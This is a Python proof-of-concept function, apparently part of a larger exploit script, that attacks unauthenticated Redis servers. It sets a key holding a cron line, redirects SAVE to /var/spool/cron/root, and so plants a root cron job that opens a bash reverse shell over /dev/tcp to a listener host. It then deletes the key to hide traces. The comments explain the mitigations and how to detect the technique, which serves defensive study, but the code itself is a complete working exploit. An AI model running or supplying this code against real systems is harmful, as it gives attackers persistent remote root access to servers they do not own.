def poc(url):
    """Probe a Redis instance at *url* and, if it answers unauthenticated
    INFO, abuse CONFIG SET dir/dbfilename + SAVE to drop an RDB file at
    /var/spool/cron/root whose contents include a cron line.

    This is the well-known "unauthenticated Redis -> cron persistence"
    technique. From a defender's view the preconditions are all
    configuration: the instance is reachable from the caller, accepts
    commands without AUTH, and still exposes CONFIG. Any one of
    `requirepass`, `rename-command CONFIG ""`, `protected-mode yes`,
    binding to localhost, or running redis as a non-root user (so it
    cannot write /var/spool/cron) breaks the chain.

    Detection: CONFIG SET dir / dbfilename followed by SAVE in Redis
    traffic or slowlog, and unexpected writes to /var/spool/cron from the
    redis process. The saved file is a binary RDB dump, so crond is
    expected to log parse errors around the injected line.

    Args:
        url: "host" or "host:port"; resolved through host2IP (defined
            elsewhere in this file — presumably returns the same
            "ip[:port]" shape, TODO confirm).

    Returns:
        True when INFO succeeded and the CONFIG/SAVE sequence raised no
        exception; False on any exception. Note that a non-numeric port
        suffix raises ValueError from int() *before* the try block, so
        it propagates instead of returning False.
    """
    url = host2IP(url)
    ip = url.split(':')[0]
    # Default Redis port when no ':' is present in the resolved url.
    port = int(url.split(':')[-1]) if ':' in url else 6379
    try:
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=10)
        # INFO succeeding without AUTH is the "unauthenticated" check;
        # a server with requirepass set raises here and lands in except.
        if 'redis_version' in r.info():
            # Cron line (every minute) built from module-level listen_ip /
            # listen_port; the surrounding blank lines exist so crond can
            # find it inside the otherwise binary RDB framing.
            payload = '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1\n\n'.format(ip=listen_ip,port=str(listen_port))
            path = '/var/spool/cron'
            name = 'root'
            # randomString is defined elsewhere in this file; assumed to
            # return a fresh key name so an existing key is not clobbered.
            key = randomString(10)
            r.set(key, payload)
            # CONFIG SET dir + dbfilename redirect the next SAVE to the
            # cron spool; this pair is the high-signal event for detection.
            r.config_set('dir', path)
            r.config_set('dbfilename', name)
            r.save()
            # Removes the key from the live dataset only ("clean up traces");
            # the file already written to disk still contains the payload,
            # and dbfilename is left pointing at 'root'.
            r.delete(key)
            r.config_set('dir', '/tmp')
            return True
    except Exception:
        # Connection refused, AUTH required, CONFIG renamed/disabled,
        # or a read-only spool directory all end up here.
        return False
    # Reached only when INFO succeeded but lacked 'redis_version'.
    return False